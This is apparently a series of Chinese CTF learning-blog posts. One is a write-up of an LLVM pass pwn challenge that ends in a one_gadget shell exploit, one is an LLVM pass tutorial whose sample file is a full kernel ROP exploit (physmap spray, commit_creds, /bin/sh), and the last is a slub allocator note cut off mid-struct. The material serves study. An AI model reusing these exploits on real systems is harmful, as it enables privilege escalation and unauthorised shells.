注意save中的malloc函数，它分配了一个0x20大小的chunk到bss段中，随后进行了两次memcpy内存拷贝向里面写入了某些值，具体操作如何我们下面调试的时候再行分析。在takeaway中有一大堆的条件，但最终只有一个free，猜测是满足某些条件后会释放save中分配的chunk。在stealkey中将chunk地址保存到了另外一个位置，且这个位置就在保存chunk地址的位置的上面。在fakekey中将保存chunk地址的地方写入了某个值。在run中将保存chunk的地址作为一个函数指针执行。可见如果能够在保存chunk的地方写入one_gadget，就能够打通这道题了。

下面开始调试。

2. 调试与解题

第一次测试代码：

#include <stdio.h>

void save(){printf("123456");}
void takeaway(){printf("654321");}
void stealkey(){printf("abcdef");}
void fakekey(){printf("fedcba");}
void run(){printf("888888");}

int B4ckDo0r(){
	save();
	takeaway();
	stealkey();
	fakekey();
	run();
	return 0;
}

; ModuleID = 'test.c'
source_filename = "test.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [7 x i8] c"123456\00", align 1
@.str.1 = private unnamed_addr constant [7 x i8] c"654321\00", align 1
@.str.2 = private unnamed_addr constant [7 x i8] c"abcdef\00", align 1
@.str.3 = private unnamed_addr constant [7 x i8] c"fedcba\00", align 1
@.str.4 = private unnamed_addr constant [7 x i8] c"888888\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @save() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i64 0, i64 0))
  ret void
}

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @takeaway() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @stealkey() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.2, i64 0, i64 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @fakekey() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.3, i64 0, i64 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @run() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.4, i64 0, i64 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @B4ckDo0r() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  call void @save()
  call void @takeaway()
  call void @stealkey()
  call void @fakekey()
  call void @run()
  ret i32 0
}

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.0-4ubuntu1 "}

在遍历到B4ckDo0r函数的save函数调用时，发现有一个判断条件通不过：
if ( -1431655765 * (unsigned int)((v15 + 24 * v18 - 24 * (unsigned __int64)NumTotalBundleOperands - v20) >> 3) == 2 )

推测是函数返回值或参数类型不匹配的问题，于是开始了长时间的调试和修改。

这里发现使用clang-10生成的.ll文件丢到opt里面会报错，本题使用的clang版本为clang-8，解决方法是：apt install clang-8，然后使用clang-8生成.ll文件。

经过调试发现，上面的一长串语句的等号左边值为函数的参数个数。也就是说，save函数需要有两个参数。于是我们有了第二个测试代码：

#include <stdio.h>

void save(char* a, char* b){printf("123456");}
void takeaway(){printf("654321");}
void stealkey(){printf("abcdef");}
void fakekey(){printf("fedcba");}
void run(){printf("888888");}

int B4ckDo0r(){
	save("follow", "helloworld");
	takeaway();
	stealkey();
	fakekey();
	run();
	return 0;
}

; ModuleID = 'test.c'
source_filename = "test.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [7 x i8] c"123456\00", align 1
@.str.1 = private unnamed_addr constant [7 x i8] c"654321\00", align 1
@.str.2 = private unnamed_addr constant [7 x i8] c"abcdef\00", align 1
@.str.3 = private unnamed_addr constant [7 x i8] c"fedcba\00", align 1
@.str.4 = private unnamed_addr constant [7 x i8] c"888888\00", align 1
@.str.5 = private unnamed_addr constant [7 x i8] c"follow\00", align 1
@.str.6 = private unnamed_addr constant [11 x i8] c"helloworld\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @save(i8*, i8*) #0 {
  %3 = alloca i8*, align 8
  %4 = alloca i8*, align 8
  store i8* %0, i8** %3, align 8
  store i8* %1, i8** %4, align 8
  %5 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i32 0, i32 0))
  ret void
}

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @takeaway() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @stealkey() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.2, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @fakekey() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.3, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @run() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.4, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @B4ckDo0r() #0 {
  call void @save(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.5, i32 0, i32 0), i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.6, i32 0, i32 0))
  call void @takeaway()
  call void @stealkey()
  call void @fakekey()
  call void @run()
  ret i32 0
}

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 8.0.1-9 (tags/RELEASE_801/final)"}

经过调试发现，对于上面有两个参数的save函数，.so库中的方法将其传入的函数的两个实参的内容拷贝到了一个chunk中，这是两个memcpy函数干的事情。之后的两个判断条件也是直接绕过，没有执行delete。

而第二条调用takeaway的语句的识别中，也有一个关于参数个数的判断：
if ( -1431655765 * (unsigned int)((v15 + 24 * v38 - 24 * (unsigned __int64)v39 - v40) >> 3) != 1 )
设置其有一个参数即可通过该检查。

于是有第三个测试代码：

#include <stdio.h>

void save(char* a, char* b){printf("123456");}
void takeaway(char* a){printf("654321");}
void stealkey(){printf("abcdef");}
void fakekey(){printf("fedcba");}
void run(){printf("888888");}

int B4ckDo0r(){
	save("follow", "helloworld");
	takeaway("colin");
	stealkey();
	fakekey();
	run();
	return 0;
}

; ModuleID = 'test.c'
source_filename = "test.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [7 x i8] c"123456\00", align 1
@.str.1 = private unnamed_addr constant [7 x i8] c"654321\00", align 1
@.str.2 = private unnamed_addr constant [7 x i8] c"abcdef\00", align 1
@.str.3 = private unnamed_addr constant [7 x i8] c"fedcba\00", align 1
@.str.4 = private unnamed_addr constant [7 x i8] c"888888\00", align 1
@.str.5 = private unnamed_addr constant [7 x i8] c"follow\00", align 1
@.str.6 = private unnamed_addr constant [11 x i8] c"helloworld\00", align 1
@.str.7 = private unnamed_addr constant [6 x i8] c"colin\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @save(i8*, i8*) #0 {
  %3 = alloca i8*, align 8
  %4 = alloca i8*, align 8
  store i8* %0, i8** %3, align 8
  store i8* %1, i8** %4, align 8
  %5 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i32 0, i32 0))
  ret void
}

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @takeaway(i8*) #0 {
  %2 = alloca i8*, align 8
  store i8* %0, i8** %2, align 8
  %3 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @stealkey() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.2, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @fakekey() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.3, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @run() #0 {
  %1 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.4, i32 0, i32 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @B4ckDo0r() #0 {
  call void @save(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.5, i32 0, i32 0), i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.6, i32 0, i32 0))
  call void @takeaway(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.7, i32 0, i32 0))
  call void @stealkey()
  call void @fakekey()
  call void @run()
  ret i32 0
}

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 8.0.1-9 (tags/RELEASE_801/final)"}

进入调试后发现在takeaway中某处会产生段错误，原因不明。暂且删除takeaway的调用，跳过。

在stealkey中，发现在语句byte_204100 = *key_chunk;（key_chunk就是.so中偏移0x2040F8的位置）执行前，之前save创建的chunk中保存的是一个chunk的地址，里面有save函数的两个实参的值。然后stealkey将这个chunk中的前8字节取了出来保存。

后面的fakekey同样需要传入一个参数，因此有第四个测试代码：

#include <stdio.h>

void save(char* a, char* b){printf("123456");}
void takeaway(char* a){printf("654321");}
void stealkey(){printf("abcdef");}
void fakekey(char* a){printf("fedcba");}
void run(){printf("888888");}

int B4ckDo0r(){
	save("follow", "helloworld");
	stealkey();
	fakekey("colin");
	run();
	return 0;
}

经调试发现，fakekey中关键操作前面的判断通不过，对关键地址没有任何影响：

if ( *(_BYTE *)(*(_QWORD *)v75 + 16LL) == 13 )
  SExtValue = llvm::APInt::getSExtValue((llvm::APInt *)(*(_QWORD *)v75 + 24LL));
else
  SExtValue = 0LL;

由于getSExtValue的含义是get signed extended value，获得有符号扩展的数，推测与参数有关，既然是数，猜测参数对类型有要求：必须是一个整数。于是修改了fakekey的参数类型，再次尝试。

成功通过判断条件。随后的getSExtValue函数确实返回了fakekey的第一个参数值，并将关键地址处的值加上了这个参数值。随后的run函数中就以该地址的值作为函数指针调用。由此，流程分析基本完成，思路逐渐清晰。

现在我们已知能够控制一个函数指针的值。本题给出的libc是2.27版本，可以使用one_gadget工具获取one_gadget，在此之后还有一个问题：如何获取libc的基地址并保存到这个地址中？要知道，我们能够任意修改key_chunk中值的唯二的方法是：①通过save函数的第一个参数修改；②通过fakekey函数的第一个参数修改。但是别忘了，key_chunk保存的是一个chunk指针，既然是chunk就有可能分配到原来是free chunk的chunk。如果这原来是一个unsorted bin chunk，那么fd指针处保存的不就正是main_arena处的地址吗？如果我们将save函数的第一个参数设置为’\x00’，由于memcpy函数拷贝的长度是根据字符串的长度来计算，因此save函数此时就不会覆盖这里的地址值，我们也就能够获取到main_arena中的地址了。以此为基础使用fakekey函数加上一个值让它指向one_gadget，这不就成了吗？

这是程序遍历到B4ckDo0r函数的时候的bins情况，发现0x20大小的tcache bin中有7个chunk。可以先将这7个分配出来，然后就可以通过切割unsorted bin的方式拿到main_arena的地址。

在给出的libc中，main_arena的偏移为0x3EBC40，unsorted bin的链表头地址为0x3EBCB0。以下面的libc来计算偏移。当然由于笔者是在ubuntu 20.04上面调试，因此使用本机的libc计算偏移，看看能不能在2.31的环境下打通。

在笔者的libc中，unsorted bin链表头地址为0x1ECBF0，one_gadget如下：

于是有下面的脚本：

#include <stdio.h>

void save(char* a, char* b){printf("123456");}
void takeaway(char* a){printf("654321");}
void stealkey(){printf("abcdef");}
void fakekey(long long a){printf("fedcba");}
void run(){printf("888888");}

int B4ckDo0r(){
	save("colin", "colin");
	save("colin", "colin");
	save("colin", "colin");
	save("colin", "colin");
	save("colin", "colin");
	save("colin", "colin");
	save("colin", "colin");
	
	save("\x00", "colin");
	stealkey();
	fakekey(-0x1090F2);
	run();
	return 0;
}

成功getshell。

历经艰难困苦，这道题总算是做出来了（这篇文章是笔者花了三天时间才写出来的）。通过本题我们需要注意一些关键函数的使用和一些条件控制信息的识别，就如上面提到的调用什么函数说明可能要进行参数个数的检查，调用上面函数说明可能对参数的类型有要求等等。当然做这类题目也是对我们逆向C++程序能力的训练，值得仔细深究。

LLVM pass pwn 入门 (1)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， llvm pass pwn 系列
本文字数： 11k 阅读时长 ≈ 10 分钟

近年来，pwn题出的可谓是越来越花，从C++到kernel，再到Rust、Go、Java一众语言，还有LLVM。其中LLVM在各种比赛中的出现频率越来越高，值得引起重视。借这篇文章，笔者开始LLVM pass类pwn题的入门。

首先，既然要研究LLVM，就要清楚LLVM到底是什么。

它是以C++编写的构架编译器的框架系统。用于优化以任意程序语言编写的程序的编译时间(compile-time)、链接时间(link-time)、运行时间(run-time)以及空闲时间(idle-time)，对开发者保持开放，并兼容已有脚本。（摘自资料）

LLVM在编译过程中实际上发挥了一个牵线搭桥的作用。高级语言多种多样，但无论是哪一种语言的编译器，都需要对高级语言编写的代码进行词法与句法分析，这是编译器前端部分的工作。在分析完成后，前端会输出一个抽象语法树AST，由LLVM进行分析与优化，转化为中间表示IR。再由编译器后端根据IR生成可供执行的二进制代码。

而pass是一种编译器开发的结构化技术，用于完成编译对象（如IR）的转换、分析或优化等功能。pass的执行就是编译器对编译对象进行转换、分析和优化的过程，pass构建了这些过程所需要的分析结果。
大概就是说，LLVM提供了一种中间语言形式，以及编译链接这种语言的后端能力，那么对于一个新语言，只要开发者能够实现新语言到IR的编译器前端设计，就可以享受到从IR到可执行文件这之间的LLVM提供的所有优化、分析或者代码插桩的能力。（摘自资料）

下面，笔者使用Ubuntu 20.04系统进行第一个LLVM pass的编写测试。

首先安装Clang：apt install clang，在Ubuntu 20.04安装clang会附带安装llvm-9和llvm-10，经过测试发现，只有llvm-10能够正常使用，用llvm-9的库编译会报错。

这里借资料中的测试代码编写：

myFirstLLVMpass.cpp:

#include "llvm/Pass.h"//写Pass所必须的库
#include "llvm/IR/Function.h"//操作函数所必须的库
#include "llvm/Support/raw_ostream.h"//打印输出所必须的库
#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"
 
using namespace llvm;
 
namespace { //声明匿名空间，被声明的内容仅在文件内部可见
  struct Hello : public FunctionPass {
    static char ID;
    Hello() : FunctionPass(ID) {}
    bool runOnFunction(Function &F) override {//重写runOnFunction，使得每次遍历到一个函数的时候就输出函数名
      errs() << "Hello: ";
      errs().write_escaped(F.getName()) << '\n';
      return false;
    }
  };
}
 
char Hello::ID = 0;
 
// Register for opt
static RegisterPass<Hello> X("hello", "Hello World Pass");//注册类Hello，第一个参数是命令行参数，第二个参数是名字
 
// Register for clang
static RegisterStandardPasses Y(PassManagerBuilder::EP_EarlyAsPossible,
  [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) {
    PM.add(new Hello());
  });

上面就是LLVM pass的C++代码了。我们需要一个C语言文件，这个文件中的内容无关紧要，这里用笔者做kernel pwn题中的一个文件为例：

firstLLVMtest.c:

//
// Created by root on 22-7-7.
//
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>

const size_t commit_creds = 0xFFFFFFFF810C92E0;
const size_t init_cred = 0xFFFFFFFF82A6B700;
const size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81C00FB0 + 0x1B;
const size_t ret = 0xFFFFFFFF810001FC;
const size_t poprdi_ret = 0xffffffff8108c6f0;
const size_t poprsp_ret = 0xffffffff811483d0;
const size_t add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff810737fe;
long page_size;
size_t* map_spray[16000];
size_t guess;
int dev;

size_t user_cs, user_ss, user_rflags, user_sp;

void save_status();
void print_binary(char*, int);
void info_log(char*);
void error_log(char*);
void getShell();
void makeROP(size_t*);

void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    info_log("Status has been saved.");
}

// this is a universal function to print binary data from a char* array
void print_binary(char* buf, int length){
    int index = 0;
    char output_buffer[80];
    memset(output_buffer, '\0', 80);
    memset(output_buffer, ' ', 0x10);
    for(int i=0; i<(length % 16 == 0 ? length / 16 : length / 16 + 1); i++){
        char temp_buffer[0x10];
        memset(temp_buffer, '\0', 0x10);
        sprintf(temp_buffer, "%#5x", index);
        strcpy(output_buffer, temp_buffer);
        output_buffer[5] = ' ';
        output_buffer[6] = '|';
        output_buffer[7] = ' ';
        for(int j=0; j<16; j++){
            if(index+j >= length)
                sprintf(output_buffer+8+3*j, "   ");
            else{
                sprintf(output_buffer+8+3*j, "%02x ", ((int)buf[index+j]) & 0xFF);
                if(!isprint(buf[index+j]))
                    output_buffer[58+j] = '.';
                else
                    output_buffer[58+j] = buf[index+j];
            }
        }
        output_buffer[55] = ' ';
        output_buffer[56] = '|';
        output_buffer[57] = ' ';
        printf("%s\n", output_buffer);
        memset(output_buffer+58, '\0', 16);
        index += 16;
    }
}

void error_log(char* error_info){
    printf("\033[31m\033[1m[x] Fatal Error: %s\033[0m\n", error_info);
    exit(1);
}

void info_log(char* info){
    printf("\033[33m\033[1m[*] Info: %s\033[0m\n", info);
}

void success_log(char* info){
    printf("\033[32m\033[1m[+] Success: %s\033[0m\n", info);
}

void getShell(){
    info_log("Ready to get root......");
    if(getuid()){
        error_log("Failed to get root!");
    }
    success_log("Root got!");
    system("/bin/sh");
}

void makeROP(size_t* space){
    int index = 0;
    for(; index < (page_size / 8 - 0x30); index++)
        space[index] = add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;
    for(; index < (page_size / 8 - 0x10); index++)
        space[index] = ret;
    space[index++] = poprdi_ret;
    space[index++] = init_cred;
    space[index++] = commit_creds;
    space[index++] = swapgs_restore_regs_and_return_to_usermode;
    space[index++] = 0xdeadbeefdeadbeef;
    space[index++] = 0xdeadbeefdeadbeef;
    space[index++] = (size_t)getShell;
    space[index++] = user_cs;
    space[index++] = user_rflags;
    space[index++] = user_sp;
    space[index] = user_ss;

    info_log("Spray content below:");
    print_binary((char*)space, page_size);
}

int main(){
    save_status();

    dev = open("/dev/kgadget", O_RDWR);
    if(dev < 0)     // failed to open key device, an unexpected error
        error_log("Cannot open device \"/dev/kgadget\"!");

    page_size = sysconf(_SC_PAGESIZE);      // the size of a page, namely 4096 bytes

    info_log("Spraying physmap......");

    map_spray[0] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    makeROP(map_spray[0]);

    for(int i=1; i<15000; i++){
        map_spray[i] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if(!map_spray[i])
            error_log("Mmap Failure!");
        memcpy(map_spray[i], map_spray[0], page_size);
    }

    guess = 0xffff888000000000 + 0x7000000;

    info_log("Ready to turn to kernel......");

    __asm__("mov r15, 0xdeadbeef;"
            "mov r14, 0xcafebabe;"
            "mov r13, 0xdeadbeef;"
            "mov r12, 0xcafebabe;"
            "mov r11, 0xdeadbeef;"
            "mov r10, 0xcafebabe;"
            "mov rbp, 0x12345678;"
            "mov rbx, 0x87654321;"
            "mov r9, poprsp_ret;"
            "mov r8, guess;"
            "mov rax, 0x10;"
            "mov rcx, 0x12345678;"
            "mov rdx, guess;"
            "mov rsi, 0x1bf52;"
            "mov rdi, dev;"
            "syscall;"
            );
    return 0;
}

用下面的命令可以生成.ll文件准备输入到LLVM中：clang -emit-llvm -S firstLLVMtest.c -o firstLLVMtest.ll

生成的.ll文件的前面一部分内容：

; ModuleID = 'firstLLVMtest.c'
source_filename = "firstLLVMtest.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@commit_creds = dso_local constant i64 -2129882400, align 8
@init_cred = dso_local constant i64 -2103003392, align 8
@swapgs_restore_regs_and_return_to_usermode = dso_local constant i64 -2118119477, align 8
@ret = dso_local constant i64 -2130705924, align 8
@poprdi_ret = dso_local constant i64 -2130131216, align 8
@poprsp_ret = dso_local constant i64 -2129361968, align 8
@add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = dso_local constant i64 -2130233346, align 8
@.str = private unnamed_addr constant [23 x i8] c"Status has been saved.\00", align 1
@.str.1 = private unnamed_addr constant [5 x i8] c"%#5x\00", align 1
@.str.2 = private unnamed_addr constant [4 x i8] c"   \00", align 1
@.str.3 = private unnamed_addr constant [6 x i8] c"%02x \00", align 1
@.str.4 = private unnamed_addr constant [4 x i8] c"%s\0A\00", align 1
@.str.5 = private unnamed_addr constant [34 x i8] c"\1B[31m\1B[1m[x] Fatal Error: %s\1B[0m\0A\00", align 1
@.str.6 = private unnamed_addr constant [27 x i8] c"\1B[33m\1B[1m[*] Info: %s\1B[0m\0A\00", align 1
@.str.7 = private unnamed_addr constant [30 x i8] c"\1B[32m\1B[1m[+] Success: %s\1B[0m\0A\00", align 1
@.str.8 = private unnamed_addr constant [24 x i8] c"Ready to get root......\00", align 1
@.str.9 = private unnamed_addr constant [20 x i8] c"Failed to get root!\00", align 1
@.str.10 = private unnamed_addr constant [10 x i8] c"Root got!\00", align 1
@.str.11 = private unnamed_addr constant [8 x i8] c"/bin/sh\00", align 1
@page_size = common dso_local global i64 0, align 8
@user_cs = common dso_local global i64 0, align 8
@user_rflags = common dso_local global i64 0, align 8
@user_sp = common dso_local global i64 0, align 8
@user_ss = common dso_local global i64 0, align 8
@.str.12 = private unnamed_addr constant [21 x i8] c"Spray content below:\00", align 1
@.str.13 = private unnamed_addr constant [13 x i8] c"/dev/kgadget\00", align 1
@dev = common dso_local global i32 0, align 4
@.str.14 = private unnamed_addr constant [35 x i8] c"Cannot open device \22/dev/kgadget\22!\00", align 1
@.str.15 = private unnamed_addr constant [23 x i8] c"Spraying physmap......\00", align 1
@map_spray = common dso_local global [16000 x i64*] zeroinitializer, align 16
@.str.16 = private unnamed_addr constant [14 x i8] c"Mmap Failure!\00", align 1
@guess = common dso_local global i64 0, align 8
@.str.17 = private unnamed_addr constant [30 x i8] c"Ready to turn to kernel......\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @save_status() #0 {
  call void asm sideeffect "mov user_cs, cs;mov user_ss, ss;mov user_sp, rsp;pushf;pop user_rflags;", "~{dirflag},~{fpsr},~{flags}"() #6, !srcloc !2
  call void @info_log(i8* getelementptr inbounds ([23 x i8], [23 x i8]* @.str, i64 0, i64 0))
  ret void
}

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @info_log(i8* %0) #0 {
  %2 = alloca i8*, align 8
  store i8* %0, i8** %2, align 8
  %3 = load i8*, i8** %2, align 8
  %4 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.6, i64 0, i64 0), i8* %3)
  ret void
}

上面的代码是可读的，用另外一种方式阐述了代码的执行流程。

然后使用下面的命令生成.so文件，作为LLVM的动态链接库LLVMFirst.so：
clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared myFirstLLVMpass.cpp -o LLVMFirst.so `llvm-config --ldflags

最后用下面的命令将.ll文件输入到LLVM中，如果想要得到结果可以在后面添加> [文件名]来获取：
opt -load ./LLVMFirst.so -hello ./firstLLVMtest.ll

其执行结果为：

WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: save_status
Hello: info_log
Hello: print_binary
Hello: error_log
Hello: success_log
Hello: getShell
Hello: makeROP
Hello: main

可以看到输出了很多Hello开头的行，这是因为在上面的C++程序中，我们在匿名命名空间中重载了runOnFunction函数，让LLVM输出Hello之后再输出函数的名字，这样就有了上面的几行。

在LLVM pass中可以对函数、函数中的循环、函数中的操作指令等一系列对象进行记录、修改等各种操作，具体的操作类参见资料。在下一篇文章中笔者会详细分析一道题，过一下LLVM pass类pwn题的流程。

Kernel pwn 入门 (8)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， kernel pwn 系列
本文字数： 9.9k 阅读时长 ≈ 9 分钟

在本篇文章中笔者不打算分析题目，而是对Linux中的slub系统进行深入的学习与分析。

参考资料：上一篇文章中提到的三篇与kernel内存分配有关的文章。在阅读本文时，建议与这三篇文章对照食用。

1. 伙伴系统重温

slub作为小块内存的分配器，其在伙伴系统之下运作，因此首先我们还是来回顾一下伙伴系统。

在第4篇文章中，我们简单介绍了伙伴系统的运作机理，以页为单位进行大块内存空间的分配与释放。其具体的数据结构如下图所示：

/* 伙伴系统的一个块，描述1,2,4,8,16,32,64,128,256,512或1024个连续页框的块 */
struct free_area {
    /* 指向这个块中所有空闲小块的第一个页描述符，这些小块会按照MIGRATE_TYPES类型存放在不同指针里 */
    struct list_head    free_list[MIGRATE_TYPES];
    /* 空闲小块的个数 */
    unsigned long        nr_free;
};

需要注意的是，伙伴系统并不是内核内存分配系统中最上层的结构，在其上还有其他的结构，但在Kernel pwn中我们对更为上层的结构接触较少，因此这里只介绍到伙伴系统。

上图的free_area表示一系列页的链表的数组。而在Linux系统内核中，一共有11个这样的free_area，分别保存所有大小为1,2,4,8,16,32,64,128,256,512,1024个页大小的内存空间（这些空间都是连续的），在free_area中，free_list是一系列这样的内存空间组成的链表的数组，内含多个链表，这些链表中的内存空间大小相同，但属性不同，对于MIGRATE_TYPES的定义如下：

enum migratetype {
	MIGRATE_UNMOVABLE,
	MIGRATE_MOVABLE,
	MIGRATE_RECLAIMABLE,
	MIGRATE_PCPTYPES,	/* the number of types on the pcp lists */
